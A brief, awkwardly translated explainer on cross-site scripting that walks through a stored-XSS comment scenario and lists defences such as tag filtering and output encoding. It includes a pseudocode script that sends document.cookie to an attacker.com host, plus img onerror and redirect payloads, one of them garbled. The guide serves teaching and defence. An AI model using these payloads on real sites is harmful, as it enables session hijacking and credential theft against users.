XSS stands for Cross Site Scripting, not CSS to distinguish it from stylesheets. The core principle of XSS is to execute malicious JS code in target pages.

Take A common example: Website A has A user comment function. Assuming that website A does not take any measures to prevent XSS, an attacker can enter the following content:

<script> const cookie = document.cookie; // Ajax sends cookies to the attacker's own server (pseudocode) Ajax ('http://attacker.com', cookie); </script>Copy the code

Website A saves the content to the server and displays it on the front page. At this time, user A just accesses the comment page of this page. User A’s browser recognizes script and directly executes the code in SCIRpt. It happens that the login credentials of website A are all placed in cookies, so the attacker can log in to website A as user A.

XSSAttack mode of

In addition to the script mode mentioned above, there are also , such as:

<img SRC = "onerror='alert("hey!" <a onmousemove='do something here'>Copy the code

XSSAttack intention of

  • Steal from the target web pagecookievalue

    Cookies can be set to HTTP only via the server (browser support is required, after all, cookie ownership belongs to the browser).

  • Hijacking traffic to redirect malicious traffic

    Insert code like the following:

<script>window.location.href="http://www.baidu.com"; </script>Copy the code

It’s like stealing traffic from the target site.

Precautions,

  • filter<script>,<img>,<a>Such as tag
  • Translate and encode the content uploaded by the user, so that the browser will not interpret the label and do not affect the display effect.